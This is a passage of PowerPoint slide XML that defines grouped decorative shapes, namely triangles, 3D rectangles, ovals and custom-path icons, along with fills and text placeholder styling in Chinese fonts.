                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
